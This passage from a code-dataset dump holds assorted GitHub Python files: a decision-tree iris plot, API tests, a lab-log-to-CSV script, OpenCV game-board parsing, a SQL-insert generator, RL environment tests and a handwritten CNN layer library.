# .shape returns the dimensions of the array\n # arange (start,stop,step) creates a 1-D vector\n idx = np.arange(X.shape[0]) # returns an array from 0 to X.shape[0], or 150\n np.random.seed(13) # Seed the randomization \n np.random.shuffle(idx) # Shuffle in place based on the seeded randomization\n \n X = X[idx] # re-sort X randomly based on IDX as indices\n y = y[idx]\n\n # Standardize\n mean = X.mean(axis=0) # Take the mean over the first axis (long axis)\n std = X.std(axis=0)\n X = (X - mean) / std # Normalize to a 'normal distribution'\n\n # Train\n clf = DecisionTreeClassifier().fit(X, y)\n\n # Plot the decision boundary\n plt.subplot(2, 3, pairidx + 1)\n\n x_min, x_max = X[:, 0].min() - 1, X[:, 0].max() + 1\n y_min, y_max = X[:, 1].min() - 1, X[:, 1].max() + 1\n\n # Meshgrid creates coordinate grid from vectors of coordinates\n xx, yy = np.meshgrid(np.arange(x_min, x_max, plot_step),\n np.arange(y_min, y_max, plot_step))\n\n # Ravel creates a 1-D view of the vector\n # c_ concatenates 1D vectors into columns of a 2D array, basically\n # making xx.ravel() column 0, yy.ravel() column 1\n Z = clf.predict(np.c_[xx.ravel(), yy.ravel()])\n Z = Z.reshape(xx.shape)\n cs = plt.contourf(xx, yy, Z, cmap=plt.cm.Paired)\n\n plt.xlabel(iris.feature_names[pair[0]])\n plt.ylabel(iris.feature_names[pair[1]])\n plt.axis(\"tight\")\n\n # Plot the training points\n for i, color in zip(range(n_classes), plot_colors):\n idx = np.where(y == i)\n plt.scatter(X[idx, 0], X[idx, 1], c=color, label=iris.target_names[i],\n cmap=plt.cm.Paired)\n\n plt.axis(\"tight\")\n\nplt.suptitle(\"Decision surface of a decision tree using paired features\")\nplt.legend()\nplt.show()\n","repo_name":"doankhue-nh/Assignment_HW1_142076","sub_path":"hw1_skeleton/example_dt_iris.py","file_name":"example_dt_iris.py","file_ext":"py","file_size_in_byte":2981,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"5"} +{"seq_id":"22746044121","text":"import json\n\nimport pytest\n\nfrom app.core.config import settings\n\n\nclass TestIngredientInvalid:\n @pytest.mark.parametrize(\n \"payload, code\",\n [\n (dict(ingredient=[\"tomato\"]), 422),\n (dict(ingredient={\"name\": \"tomato\"}), 422),\n ],\n )\n def test_add_ingredient_invalid(self, client, payload, code):\n data = json.dumps(payload)\n resp = client.post(f\"{settings.api.version}/ingredients/\", data=data)\n assert resp.status_code == code\n\n def test_get_ingredient_invalid(self, client):\n resp = client.get(f\"{settings.api.version}/ingredients/0/\")\n assert resp.status_code == 404\n\n def test_get_ingredients_invalid(self, client):\n resp = client.get(f\"{settings.api.version}/ingredient/\")\n assert resp.status_code == 404\n\n def test_update_ingredient_invalid(self, client):\n resp = client.put(\n f\"{settings.api.version}/ingredients/0/\", data=json.dumps(dict())\n )\n assert resp.status_code == 404\n\n def test_remove_ingredient_invalid(self, client):\n resp = client.delete(f\"{settings.api.version}/ingredients/0/\")\n assert resp.status_code == 404\n","repo_name":"AlexNilsson/mychef","sub_path":"backend/api/tests/api/test_ingredients_invalid.py","file_name":"test_ingredients_invalid.py","file_ext":"py","file_size_in_byte":1191,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"5"} +{"seq_id":"16656357381","text":"import json\r\nimport csv\r\nimport re\r\nimport os\r\nimport pandas as pd\r\nimport numpy as np\r\n\r\n#getting the path of all the jsons in the directory\r\nfiles = []\r\nd = \"F:/Nirrogyan/AWS/aws logs/\"\r\nfor path in os.listdir(d):\r\n full_path = os.path.join(d, path)\r\n files.append(full_path)\r\n\r\n#extracting the dataset of the person who has taken the most number of tests (results from another script) to make a list of all the test available\r\ntests = []\r\nfor m in range(0, len(files)):\r\n with open(files[m]) as f:\r\n for line in f:\r\n final_data = []\r\n x = re.search(\"{\\\"header\\\"\", line)\r\n if x != None:\r\n data = (line[(x.span()[0]):])\r\n s = json.loads(data)\r\n\r\n if (s['header']['personInfo']['name']) == 'Murtaza Beawerwala':\r\n for i in range (0, len(s['values'])):\r\n tests.append(s['values'][i]['param'])\r\n break\r\ntests = np.unique(tests)\r\n\r\n# extracting from each file\r\nfor m in range(0, len(files)):\r\n with open(files[m]) as f:\r\n for line in f:\r\n final_data = []\r\n x = re.search(\"{\\\"header\\\"\", line)\r\n if x != None:\r\n data = (line[(x.span()[0]):])\r\n s = json.loads(data)\r\n\r\n tests_data = {}\r\n\r\n patient_id = s['header']['personInfo']['name'].lower().replace(' ', '_')\r\n name = s['header']['personInfo']['name']\r\n age = int(s['header']['personInfo']['age'])\r\n gender = s['header']['personInfo']['gender']\r\n date = s['header']['date']\r\n order_id = int(s['values'][0]['order_id'])\r\n \r\n if gender == 'male':\r\n tests_data.update(patient_id = 'm_{}_{}'.format(age, patient_id))\r\n else:\r\n tests_data.update(patient_id = 'f_{}_{}'.format(age, patient_id))\r\n \r\n tests_data.update(name = name)\r\n tests_data.update(age = age)\r\n tests_data.update(gender = gender)\r\n tests_data.update(date = date)\r\n tests_data.update(order_id = order_id)\r\n \r\n for j in range(0, len(tests)):\r\n for i in range(0, len(s['values'])):\r\n if tests[j] == s['values'][i]['param']:\r\n \r\n try:\r\n try:\r\n tests_data.update({'test{}'.format(j): float(s['values'][i]['value'])})\r\n except ValueError:\r\n tests_data.update({'test{}'.format(j):s['values'][i]['value']})\r\n except KeyError:\r\n tests_data.update({'test{}'.format(j): '-'})\r\n break\r\n #checking for the tests not taken by the patient \r\n if i == (len(s['values']) - 1) and (tests[j] != s['values'][i]['param']):\r\n tests_data.update({'test{}'.format(j): '{} : N/A'.format(tests[j])})\r\n \r\n final_data.append(tests_data)\r\n #All the data has been stored in the dict.\r\n\r\n #Putting all the data in a csv\r\n data_file = open('testing.csv', 'a')\r\n csv_writer = csv.writer(data_file)\r\n count = 0\r\n\r\n for j in final_data:\r\n csv_writer.writerow(j.values())\r\n data_file.close()\r\n\r\n else:\r\n continue","repo_name":"Ishanbhatia98/Niroggyan","sub_path":"Get_active_data_analysis/notebooks/datascript.py","file_name":"datascript.py","file_ext":"py","file_size_in_byte":3675,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"37958682672","text":"\"\"\"\nimage_filtering\nAuthor: Neil Balaskandarajah\nCreated on: 24/06/2020\nImage of game in -> model of game out\n\"\"\"\nfrom model.game import Game\nimport cv2\nimport numpy as np\n\n# (Hue, Hue Tolerance, Close Size, V Min)\nCOLORS = {\n 'gren': (63, 5, 1, 240),\n 'red ': (176, 3, 3, 250),\n 'cyan': (95, 5, 3, 255),\n 'blue': (109, 3, 1, 240),\n 'purp': (144, 3, 1, 206),\n 'pink': (153, 4, 1, 253),\n 'orng': (25, 5, 1, 0)\n}\n\nLOWER_BG = (0,0,250)\nUPPER_BG = (255, 255, 255)\n\ndef draw_rect(image, rect, clr):\n \"\"\"Draw a rectangle onto an image\n\n @param image: Image to draw onto\n @param rect: Rectangle object in (top_left_x, top_left_y, width, height) format\n @param clr: Color of the rectangle in BGR format\n @return: Image with the rectangle drawn over\n \"\"\"\n x,y,w,h = rect\n return cv2.rectangle(image, (x,y), (x+w,y+h), clr, 2)\n\ndef scale_image(image, s):\n \"\"\"Scale an image up by a factor s\n\n @param image: Image to scale\n @param s: Scale factor\n @return: Scaled image\n \"\"\"\n w = int(image.shape[1] * s)\n h = int(image.shape[0] * s)\n return cv2.resize(image, (w, h))\n\n#--------------Functions--------------#\n\ndef filter_bg(image, lower=LOWER_BG, upper=UPPER_BG, e=5):\n \"\"\"Filter the background out for an image given lower and upper bounds\n Convert to HSV -> threshold in range -> morphologically close\n\n @param image: Image to filter\n @param lower: Lower bound (h, s, v)\n @param upper: Upper bound (h, s, v)\n @param e: Erosion size (integer)\n @return: Image with the background filtered out\n \"\"\"\n image = cv2.cvtColor(image, cv2.COLOR_BGR2HSV)\n image = cv2.inRange(image, np.array(lower), np.array(upper))\n image = cv2.morphologyEx(image, cv2.MORPH_CLOSE, np.ones((e, e), np.uint8))\n\n return image\n\ndef get_stack_bounds(image):\n \"\"\"Get the bounds of the stacks from the image\n\n @param image: Image to find the stacks within\n @return: List of bounding rects in the image\n \"\"\"\n # Backgroundless\n no_bg = filter_bg(image)\n\n # Get the bounding box for each stack\n contours, _ = cv2.findContours(no_bg, cv2.RETR_LIST, cv2.CHAIN_APPROX_SIMPLE)\n # no_bg = cv2.drawContours(no_bg, contours, -1, (255, 0, 0))\n cv2.imshow('no bg', no_bg)\n cv2.waitKey(0)\n cv2.destroyAllWindows()\n\n return [cv2.boundingRect(c) for c in contours if cv2.contourArea(c) > 5] #remove erroneous small contours\n\ndef get_click_locations(stack_bounds):\n \"\"\"Get the coordinates of the clicking location for each boundingRect\n\n @param stack_bounds: boundingRects\n @return: The centers of each stack bound\n \"\"\"\n STACK_LABELS = 'ABCDEFGHIJ'\n\n stacks = dict()\n for i, rect in enumerate(stack_bounds):\n x,y,w,h = rect\n stacks[STACK_LABELS[i]] = (x+w//2, y+h//2)\n\n return stacks\n\ndef get_stack_images(image, bounds=None):\n \"\"\"Return the subimage of each stack in the image\n\n @param image: Image to pull stack images from\n @param bounds: The bounds of each stack\n @return: The image for each stack\n \"\"\"\n if bounds is None:\n bounds = get_stack_bounds(image)\n return [image[y:y + h, x:x + w] for x, y, w, h in bounds]\n\ndef game_from_image(img):\n \"\"\"Create a Game object that the backtracking algorithm can solve from an image\n\n @param img: Snapshot of all stacks\n @return: Game object (list of stacks)\n \"\"\"\n # Get the bounding box of each stack\n stack_bounds = get_stack_bounds(img)\n\n # Get the click locations for each stack\n clicks = get_click_locations(stack_bounds)\n\n # Get the image for each stack\n stack_imgs = get_stack_images(img, stack_bounds)\n\n # Create the Game object and the stacks to it\n # TO-DO: Move this to the Game object\n stacks = [get_game_stack(stack_img) for stack_img in stack_imgs]\n num_pieces = calc_num_pieces(stacks)\n game = Game(num_pieces)\n game.add_stacks(stacks)\n\n return game, clicks\n\ndef calc_num_pieces(stacks):\n # TO-DO: Move this to game\n \"\"\"Calculate the number of pieces in all of the stacks\n\n @param stacks: List of stacks\n @return: Number of pieces in a single stack\n \"\"\"\n #Choose a color\n color = None\n for stack in stacks:\n if len(stack) > 0:\n color = stack[0]\n\n #Max number of pieces is how many of any color is in all the stacks\n num_pieces = 0\n for stack in stacks:\n for piece in stack:\n if piece == color:\n num_pieces += 1\n return num_pieces\n\ndef get_game_stack(stack_img):\n \"\"\"Create a stack that can be added to a Game object from an image of the stack\n\n @param stack_img: Image of a single stack\n @return: List of hoops (each hoop is represented by a color)\n \"\"\"\n img = stack_img\n hsv = cv2.cvtColor(img, cv2.COLOR_BGR2HSV)\n\n stack = []\n for color in COLORS:\n contours = thresh_color(img, hsv, COLORS[color])\n for contour in contours:\n stack.append((color, cv2.boundingRect(contour)[1])) #Color name, y value\n\n stack = sorted(stack, key=lambda x: x[1]) #Sort by y value\n return [hoop[0] for hoop in stack] #Return just the names\n\ndef thresh_color(img, img_hsv, clr):\n \"\"\"Return the vertical positions of the contours of the color clr\n\n @param img: Image to filter\n @param img_hsv: The hsv version of the image\n @param clr: Color to filter in (Hue, Hue Tolerance, Close Size, V Min) format\n @return: Vertical positions of all contours of the color clr\n \"\"\"\n lowerb = (clr[0] - clr[1], 0, clr[3])\n upperb = (clr[0] + clr[1], 255, 255)\n\n mask = cv2.inRange(img_hsv, lowerb, upperb)\n img = cv2.bitwise_and(img, img, mask=mask)\n\n # Open up the image to remove spots inside\n img = cv2.morphologyEx(img, cv2.MORPH_OPEN, np.ones((clr[2], clr[2]), np.uint8))\n\n # Find contours\n hsv = cv2.cvtColor(img, cv2.COLOR_BGR2HSV)\n cont_mask = cv2.inRange(hsv, lowerb, upperb)\n contours, _ = cv2.findContours(cont_mask, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)\n\n # Filter out bad contours\n contours = filter_out_contours(contours)\n\n return contours\n\ndef filter_out_contours(contours):\n \"\"\"Filter out bad contours that are not hoops\n\n @param contours: List of contours\n @return: Contours that are/contain hoops\n \"\"\"\n i = 0\n while i < len(contours):\n area = -cv2.contourArea(contours[i], True)\n\n if abs(area) < 180: # Small area\n contours.pop(i)\n continue\n\n if area < 0: # Black contour\n contours.pop(i)\n continue\n i += 1\n return contours\n\ndef is_black(img):\n \"\"\"Return whether an image is all black or not\n\n @param img: Image to check\n @return: True if the image is all black, false if not\n \"\"\"\n return cv2.countNonZero(cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)) == 0\n","repo_name":"NeilRajah/HoopStackAI","sub_path":"cv/image_filtering.py","file_name":"image_filtering.py","file_ext":"py","file_size_in_byte":6810,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"72624047192","text":"import sys\nsys.stdin = open('input.txt')\n\nT = int(input())\nfor tc in range(1, T+1):\n x = input()\n y = input()\n while len(x) <= len(y):\n if x in y:\n print('#{} 1'.format(tc))\n break\n else:\n print('#{} 0'.format(tc))\n break\n# sol2\nT = int(input())\nfor tc in range(1, T+1):\n s1 = input() # XYPV\n s2 = input() # EOGGXYPVST\n\n # s1의 길이만큼 슬라이딩 윈도우 생성\n window = len(s1)\n\n # s1의 길이만큼 하나씩 확인\n result = 0\n for i in range(len(s2) - window +1):\n # 일치하면\n if s1 == s2[i:i+window]:\n result = 1\n break\n print('#{} {}'.format(tc, result))\n\n","repo_name":"Leeyounwoo/Algorithm","sub_path":"In SSAFY/0817/hee_hannah/4864_compare_string/s1.py","file_name":"s1.py","file_ext":"py","file_size_in_byte":705,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"27025387582","text":"# coding=utf-8\n\nimport os\n\nttm = 'XD_BAIDUXD_LOAN_RATE'\n# 模版路径\nfilePath = r\"E:\\tmp\\0731\\%s.sql\"%ttm\n\n## 输出路径\nout_file_path = r\"\\\\USER-20190220BH\\mnt\\%s.sql\"%ttm\n\n\nf = open(filePath, 'r', encoding='utf-8')\nlines = f.readlines()\n\nif os.path.exists(out_file_path):\n os.remove(out_file_path)\n\nwf = open(out_file_path, 'w', encoding='utf-8')\nfor li in lines:\n dd = li.split(',')\n print(dd[0],dd[1],dd[2],dd[3],dd[4],dd[5],dd[6])\n cloName = dd[0].strip()\n cloNo = int(dd[1].strip())+1\n cloType = dd[2].strip()\n cloLength = dd[3].strip()\n cloScle = dd[4].strip()\n cloKey = dd[5].strip()\n cloRmark = dd[6].strip()\n sch_key = 'CORE_%s'%ttm\n if cloKey != '' and cloKey != '0' and cloKey != 'null':\n cloKey = 'XX'\n if cloScle == '0':\n cloScle = ''\n ss = \"INSERT INTO table_field(ord_number, field_code, field_type, field_len, field_accuracy, key_flag, scheme_key)\" \\\n \"VALUES('%s','%s','%s','%s','%s','%s','%s');\\r\" %(cloNo,cloName,cloType,cloLength,cloScle,cloKey,sch_key)\n wf.write(ss)\nwf.close()\n","repo_name":"Wzhenshuai/JNBank","sub_path":"test/reader_table.py","file_name":"reader_table.py","file_ext":"py","file_size_in_byte":1066,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"37005354739","text":"import numpy as np\nimport pytest\n\nfrom environments import UnityEnv, OpenAiEnv, MpEnv\n\n\n@pytest.fixture\ndef env():\n env = UnityEnv('Reacher_Linux_NoVis_1/Reacher.x86_64')\n try:\n yield env\n finally:\n env.close()\n\n\ndef test_banana_env(env):\n state = env.reset()\n assert isinstance(state, np.ndarray)\n assert state.shape == (33,)\n\n next_state, reward, done, info = env.step([0., 0., 0., 0.])\n assert isinstance(state, np.ndarray)\n assert next_state.shape == (33,)\n\n assert isinstance(reward, float)\n assert isinstance(done, bool)\n\n assert env.nA == 4\n assert env.nS == 33\n\n\ndef test_cart_pole():\n env = OpenAiEnv('CartPole-v1')\n env.initialize(True)\n state = env.reset()\n assert state.shape == (4,)\n state, rewards, done, info = env.step(0)\n assert state.shape == (4,)\n assert isinstance(rewards, float)\n assert isinstance(done, bool)\n\n\ndef test_mp_env_eval_mode():\n env = MpEnv('CartPole-v1')\n env.initialize(False)\n state = env.reset()\n assert state.shape == (4,)\n state, rewards, done, info = env.step(0)\n assert state.shape == (4,)\n assert isinstance(rewards, float)\n assert isinstance(done, bool)\n\n\ndef test_mp_env_train_mode():\n env = MpEnv('CartPole-v1', n_workers=2)\n try:\n env.initialize(True)\n state = env.reset(rank=0)\n assert state.shape == (4,)\n states = env.reset()\n assert states.shape == (2, 4)\n states, rewards, dones, infos = env.step([0, 0])\n assert states.shape == (2, 4)\n assert rewards.shape == (2, 1)\n assert dones.shape == (2, 1)\n finally:\n env.close()\n","repo_name":"piotrbazan/udacity_drlnd_projects","sub_path":"p2_continuous_control/test_environments.py","file_name":"test_environments.py","file_ext":"py","file_size_in_byte":1654,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"16733326537","text":"from abc import abstractmethod\r\nimport numpy as np\r\nfrom handcrafted_nn.tensor import tensor\r\nfrom handcrafted_nn.parameter import parameter\r\nfrom handcrafted_nn.pure_data import pure_data\r\n\r\nclass operation(tensor):\r\n def __init__(self):\r\n super().__init__()\r\n pass\r\n\r\n def __call__(self,x):\r\n # self.input.append(x.input)\r\n # self.input.append(self)\r\n return self.forward(x)\r\n \r\n @abstractmethod\r\n def forward():\r\n ...\r\n\r\n @abstractmethod\r\n def backward():\r\n ...\r\n\r\nclass conv2D(operation):\r\n def __init__(self, filter_size=(3,3),in_channel = 1, out_channel = 1, stride = 1, padding=0):\r\n super().__init__()\r\n self.b = parameter(matrix=np.random.rand(1,1,1, out_channel)/10)\r\n self.W = parameter(matrix=np.random.rand(in_channel,filter_size[0], filter_size[1], out_channel)/10)\r\n self.db = parameter(matrix=np.zeros([1,1,1, out_channel]))\r\n self.dW = parameter(matrix=np.zeros([in_channel,filter_size[0], filter_size[1], out_channel]))\r\n self.stride = stride\r\n self.padding = padding\r\n self.v_w = parameter(matrix=np.zeros([in_channel,filter_size[0], filter_size[1], out_channel]))\r\n self.v_b = parameter(matrix=np.zeros([1,1,1, out_channel]))\r\n\r\n def conv_single_step(self, A, W, b):\r\n s = np.multiply(A, W)\r\n z = np.sum(s)\r\n z = z + b.astype(float)\r\n return z\r\n\r\n def zero_pad(self, X, pad):\r\n X_pad = np.pad(X, ((0,0), (0,0), (pad,pad), (pad,pad)), 'constant', constant_values = (0,0))\r\n return X_pad\r\n \r\n def forward(self, input_A):\r\n self.A = input_A\r\n input_A = input_A.matrix\r\n (batch, n_C_prev, n_H_prev, n_W_prev) = input_A.shape\r\n # Retrieve dimensions from W's shape (≈1 line)\r\n (n_C_prev, f, f, n_C) = self.W.shape\r\n \r\n # Compute the dimensions of the CONV output volume using the formula given above. Hint: use int() to floor. (≈2 lines)\r\n n_H = int((n_H_prev + 2*self.padding - f)/self.stride) + 1\r\n n_W =int((n_W_prev + 2*self.padding - f)/self.stride) + 1\r\n \r\n # Initialize the output volume Z with zeros. (≈1 line)\r\n Z = np.zeros([batch,n_C, n_H, n_W])\r\n # Create A_prev_pad by padding A_prev\r\n A_prev_pad = self.zero_pad(input_A, self.padding)\r\n \r\n for i in range(batch): # loop over the batch of training examples\r\n a_prev_pad = A_prev_pad[i,:,:,:] # Select ith training example's padded activation\r\n for h in range(n_H): # loop over vertical axis of the output volume\r\n for w in range(n_W): # loop over horizontal axis of the output volume\r\n for c in range(n_C): # loop over channels (= #filters) of the output volume\r\n \r\n # Find the corners of the current \"slice\" (≈4 lines)\r\n vert_start = h*self.stride\r\n vert_end = h*self.stride + f\r\n horiz_start = w*self.stride \r\n horiz_end = w*self.stride + f\r\n \r\n # Use the corners to define the (3D) slice of a_prev_pad (See Hint above the cell). (≈1 line)\r\n a_slice_prev = a_prev_pad[:,vert_start:vert_end,horiz_start:horiz_end]\r\n \r\n \r\n # Convolve the (3D) slice with the correct filter W and bias b, to get back one output neuron. (≈1 line)\r\n Z[i,c, h, w] = self.conv_single_step(a_slice_prev, self.W.matrix[:, :, :, c], self.b.matrix[:,:,:,c])\r\n \r\n ### END CODE HERE ###\r\n \r\n # Making sure your output shape is correct\r\n assert(Z.shape == (batch, n_C, n_H, n_W))\r\n self.matrix = Z\r\n return parameter(Z)\r\n\r\n def backward(self, up_grad):\r\n # Retrieve dimensions from A_prev's shape\r\n (batch, n_C_prev, n_H_prev, n_W_prev) = self.A.shape\r\n \r\n # Retrieve dimensions from W's shape\r\n (n_C_prev, f, f, n_C) = self.W.shape\r\n \r\n \r\n # Retrieve dimensions from dZ's shape\r\n (batch, n_C, n_H, n_W) = up_grad.shape\r\n \r\n # Initialize dA_prev, dW, db with the correct shapes\r\n dA_prev = np.zeros((batch, n_C_prev, n_H_prev, n_W_prev)) \r\n dW = np.zeros((n_C_prev, f, f, n_C))\r\n db = np.zeros((1, 1, 1, n_C))\r\n\r\n # Pad A_prev and dA_prev\r\n\r\n A_prev_pad = self.zero_pad(self.A.matrix, self.padding)\r\n dA_prev_pad = self.zero_pad(dA_prev, self.padding)\r\n \r\n for i in range(batch): # loop over the training examples\r\n \r\n # select ith training example from A_prev_pad and dA_prev_pad\r\n a_prev_pad = A_prev_pad[i]\r\n da_prev_pad = dA_prev_pad[i]\r\n \r\n for h in range(n_H): # loop over vertical axis of the output volume\r\n for w in range(n_W): # loop over horizontal axis of the output volume\r\n for c in range(n_C): # loop over the channels of the output volume\r\n \r\n # Find the corners of the current \"slice\"\r\n vert_start = h\r\n vert_end = vert_start + f\r\n horiz_start = w\r\n horiz_end = horiz_start + f\r\n \r\n # Use the corners to define the slice from a_prev_pad\r\n a_slice = a_prev_pad[:, vert_start:vert_end, horiz_start:horiz_end]\r\n\r\n # Update gradients for the window and the filter's parameters using the code formulas given above\r\n da_prev_pad[:, vert_start:vert_end, horiz_start:horiz_end] += self.W.matrix[:,:,:,c] * up_grad.matrix[i, c, h, w]\r\n dW[:,:,:,c] += a_slice * up_grad.matrix[i, c, h, w]\r\n db[:,:,:,c] += up_grad.matrix[i, c, h, w]\r\n \r\n # Set the ith training example's dA_prev to the unpaded da_prev_pad (Hint: use X[pad:-pad, pad:-pad, :])\r\n if self.padding == 0:\r\n dA_prev[i, :, :, :] = da_prev_pad\r\n else:\r\n dA_prev[i, :, :, :] = da_prev_pad[:, self.padding:-self.padding, self.padding:-self.padding]\r\n ### END CODE HERE ###\r\n \r\n # Making sure your output shape is correct\r\n assert(dA_prev.shape == (batch, n_C_prev, n_H_prev, n_W_prev))\r\n self.dA = parameter(dA_prev)\r\n self.db = self.db + parameter(db)\r\n self.dW = self.dW + parameter(dW)\r\n\r\n return self.dA\r\n\r\n def update(self,lr, beta = 1):\r\n\r\n self.A = self.A - self.dA.multiply_constant(lr)\r\n self.dA = parameter(matrix=np.array([]))\r\n self.b = self.b - self.db.multiply_constant(lr)\r\n self.db = parameter(matrix=np.zeros_like(self.db.matrix))\r\n self.W = self.W - self.dW.multiply_constant(lr)\r\n self.dW = parameter(matrix=np.zeros_like(self.dW.matrix))\r\n return \r\n\r\nclass pooling_2D(operation):\r\n def __init__(self,filter = 2, stride = 2, mode='max'):\r\n super().__init__()\r\n self.mode = mode\r\n self.f = filter\r\n self.stride = stride\r\n\r\n def create_mask_from_window(self,x):\r\n mask = x == np.max(x)\r\n return mask\r\n\r\n def distribute_value(self, dz, shape):\r\n (n_H, n_W) = shape\r\n average = dz / (n_H * n_W)\r\n a = np.ones(shape) * average\r\n \r\n return a\r\n\r\n def forward(self, input_A):\r\n self.A = input_A\r\n (m, n_C_prev, n_H_prev, n_W_prev) = input_A.shape\r\n \r\n # Define the dimensions of the output\r\n n_H = int(1 + (n_H_prev - self.f) / self.stride)\r\n n_W = int(1 + (n_W_prev - self.f) / self.stride)\r\n n_C = n_C_prev\r\n \r\n # Initialize output matrix A\r\n A = np.zeros((m, n_C, n_H, n_W)) \r\n \r\n ### START CODE HERE ###\r\n for i in range(m): # loop over the training examples\r\n for h in range(n_H): # loop on the vertical axis of the output volume\r\n for w in range(n_W): # loop on the horizontal axis of the output volume\r\n for c in range (n_C): # loop over the channels of the output volume\r\n \r\n # Find the corners of the current \"slice\" (≈4 lines)\r\n vert_start = h*self.stride\r\n vert_end = h*self.stride +self.f\r\n horiz_start = w*self.stride\r\n horiz_end = w*self.stride + self.f\r\n \r\n # Use the corners to define the current slice on the ith training example of A_prev, channel c. (≈1 line)\r\n a_prev_slice = input_A.matrix[i, c, vert_start:vert_end, horiz_start:horiz_end]\r\n \r\n # Compute the pooling operation on the slice. Use an if statment to differentiate the modes. Use np.max/np.mean.\r\n if self.mode == \"max\":\r\n A[i, c, h, w] = np.max(a_prev_slice)\r\n elif self.mode == \"average\":\r\n A[i, c, h, w] = np.mean(a_prev_slice)\r\n \r\n ### END CODE HERE ###\r\n \r\n # Making sure your output shape is correct\r\n assert(A.shape == (m, n_C, n_H, n_W))\r\n self.matrix = A\r\n return parameter(A)\r\n\r\n def backward(self, up_grad):\r\n m,n_C_prev, n_H_prev, n_W_prev = self.A.shape\r\n m, n_C, n_H, n_W = up_grad.shape\r\n dA_prev = np.zeros(self.A.shape)\r\n \r\n for i in range(m): # loop over the training examples\r\n a_prev = self.A()[i]\r\n for h in range(n_H): # loop on the vertical axis\r\n for w in range(n_W): # loop on the horizontal axis\r\n for c in range(n_C): # loop over the channels (depth)\r\n vert_start = h\r\n vert_end = vert_start + self.f\r\n horiz_start = w\r\n horiz_end = horiz_start + self.f\r\n # Compute the backward propagation in both modes.\r\n if self.mode == \"max\":\r\n a_prev_slice = a_prev[c, vert_start:vert_end, horiz_start:horiz_end]\r\n mask = self.create_mask_from_window(a_prev_slice)\r\n dA_prev[i, c, vert_start:vert_end, horiz_start:horiz_end] += np.multiply(mask, up_grad.matrix[i, c, h, w])\r\n \r\n elif self.mode == \"average\":\r\n da = up_grad.matrix[i, c, h, w]\r\n shape = (self.f, self.f)\r\n dA_prev[i, c, vert_start:vert_end, horiz_start:horiz_end] += self.distribute_value(da, shape)\r\n \r\n ### END CODE ###\r\n \r\n # Making sure your output shape is correct\r\n assert(dA_prev.shape == self.A.shape)\r\n self.dA = parameter(matrix=dA_prev)\r\n return self.dA\r\n\r\n def update(self, lr = 1):\r\n self.A = self.A - self.dA.multiply_constant(lr)\r\n self.dA = parameter(matrix=np.array([]))\r\n return \r\n\r\nclass relu(operation):\r\n def __init__(self):\r\n super().__init__()\r\n\r\n def forward(self, input_A):\r\n self.A = input_A\r\n self.matrix = np.maximum(0,input_A.matrix)\r\n return parameter(self.matrix)\r\n\r\n def backward(self, up_grad):\r\n self.dA = parameter(np.multiply(np.where(self.A.matrix < 0, 0,1), up_grad.matrix))\r\n return self.dA\r\n\r\n def update(self,lr = 1):\r\n self.A = self.A - self.dA.multiply_constant(lr)\r\n self.dA = parameter(matrix=np.array([]))\r\n return\r\n\r\nclass fully_connection(operation):\r\n def __init__(self, in_num, out_num):\r\n super().__init__()\r\n self.W = parameter(matrix=np.random.rand(in_num, out_num)/100)\r\n self.b = parameter(matrix=np.random.rand(out_num)/100)\r\n self.dW = parameter(matrix=np.zeros((in_num, out_num)))\r\n self.db = parameter(matrix=np.zeros(out_num))\r\n\r\n def forward(self, input_A):\r\n self.A = input_A\r\n batch = input_A.shape[0]\r\n reshape_input = input_A.matrix.reshape(batch, -1)\r\n Z = np.dot(reshape_input, self.W.matrix) + self.b.matrix.T\r\n self.matrix = Z\r\n return parameter(Z)\r\n\r\n def backward(self, up_grad):\r\n batch = self.A.shape[0]\r\n self.dA = parameter(np.dot(up_grad.matrix, self.W.matrix.T).reshape(self.A.shape))\r\n self.dW = self.dW + parameter(matrix=np.dot(self.A.matrix.reshape(batch,-1).T,up_grad.matrix))\r\n self.db = self.db + parameter(matrix=np.sum(up_grad.matrix, axis=0))\r\n return self.dA\r\n\r\n def update(self,lr):\r\n self.A = self.A - self.dA.multiply_constant(lr)\r\n self.dA = parameter(matrix=np.array([]))\r\n self.b = self.b - self.db.multiply_constant(lr)\r\n self.db = parameter(matrix=np.zeros_like(self.db))\r\n self.W = self.W - self.dW.multiply_constant(lr)\r\n self.dW = parameter(matrix=np.zeros_like(self.dW.matrix))\r\n return \r\n\r\nclass softmax_crossentropy(operation):\r\n def __init__(self):\r\n super().__init__()\r\n\r\n def __call__(self, input_A, target):\r\n self.A = input_A\r\n self.target = target\r\n return super().__call__(input_A)\r\n\r\n def softmax(self,x):\r\n x = x.matrix\r\n for batch in range(x.shape[0]):\r\n sum = np.sum(np.exp(x[batch].astype('float')))\r\n x[batch,:] = np.exp(x[batch,:].astype('float'))/sum\r\n return x\r\n\r\n def forward(self,input_A):\r\n loss = -np.sum(np.multiply(self.target.matrix==1, np.log(self.softmax(input_A).astype('float'))))\r\n self.matrix = loss\r\n return parameter(loss)\r\n\r\n def backward(self):\r\n da_prev = self.A - self.target\r\n self.dA =da_prev\r\n return self.dA\r\n\r\n def update(self, lr):\r\n self.A = self.A - self.dA.multiply_constant(lr)\r\n self.dA = parameter(matrix=np.array([0]))\r\n return\r\n\r\n\r\n\r\nif __name__ == \"__main__\":\r\n a = conv2D()\r\n b = pure_data(matrix=np.random.rand(2,3))\r\n target = pure_data(matrix=np.array([[1,0,0],[0,1,0]]))\r\n pool = pooling_2D()\r\n relu1 = relu()\r\n fc = fully_connection(9, 10)\r\n loss_fn = softmax_crossentropy()\r\n print(loss_fn(b,target).matrix)\r\n print(loss_fn.backward().shape)","repo_name":"TingHsuanLin-hub/LeNet-5","sub_path":"handcrafted_nn/operation.py","file_name":"operation.py","file_ext":"py","file_size_in_byte":15026,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"35606382678","text":"def parse_requirements(requirements):\n 